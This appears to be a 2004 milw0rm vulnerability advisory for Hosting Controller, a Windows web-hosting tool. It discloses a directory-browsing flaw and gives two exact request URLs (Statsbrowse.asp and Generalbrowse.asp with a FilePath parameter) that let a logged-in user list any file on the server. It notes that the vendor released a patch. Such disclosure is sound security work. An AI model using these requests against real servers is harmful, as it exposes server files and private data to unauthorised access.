63 lines
No EOL
1.6 KiB
Text
63 lines
No EOL
1.6 KiB
Text
Advisory Information
|
|
-------------------------
|
|
|
|
Software Package : Hosting Controller
|
|
Vendor Homepage : http://www.hostingcontroller.com
|
|
Platforms : Windows based servers
|
|
Vulnerable Versions : All version ( Tested on: v.6.1 Hotfix 1.4 )
|
|
Vendor Contacted : 12/5/2004
|
|
Release Date: : 12/7/2004
|
|
|
|
Summary
|
|
------------
|
|
|
|
Hosting Controller is a complete array of Web hosting automation tools
|
|
for the Windows Server family platform.
|
|
Hosting Controller has a security flaw which allows attackers to browse
|
|
any file and any directory on that server.
|
|
|
|
Details
|
|
---------
|
|
|
|
Vulnerability - Directories Browsing files on the system.
|
|
Foolish vulnerability:
|
|
|
|
1)This vulnerability is on the admin/mail/Statsbrowse.asp and attackers
|
|
can view the Harddisk by using this file.
|
|
Login with your account
|
|
http://www.yoursite.com/admin
|
|
Now you see
|
|
http://www.yoursite.com/admin/main.asp
|
|
Change this url to
|
|
http://www.yoursite.com/admin/mail/Statsbrowse.asp?FilePath=c:\&Opt=3&level=1&upflag=0
|
|
|
|
2)This vulnerability is on the admin/iis/Generalbrowse.asp and attackers
|
|
can view the Harddisk by using this file.
|
|
Login with your account
|
|
http://www.yoursite.com/admin
|
|
Now you see
|
|
http://www.yoursite.com/admin/main.asp
|
|
Change this url to <br/>
|
|
http://www.yoursite.com/admin/iis/Generalbrowse.asp?FilePath=C:\
|
|
|
|
Solution
|
|
----------
|
|
|
|
The vender was notified, they have released a patch.
|
|
Update Your software
|
|
|
|
Credits
|
|
---------
|
|
|
|
Discovered on May 6, 2004 by (\/) Mouse
|
|
Mouse@Shabgard.org
|
|
Additional Research: s7az2mm and bl2k
|
|
http://Shabgard.org
|
|
|
|
References
|
|
-------------
|
|
|
|
http://isun.Shabgard.org/hc.html
|
|
http://isun.Shabgard.org/hc.txt
|
|
|
|
# milw0rm.com [2004-12-05] |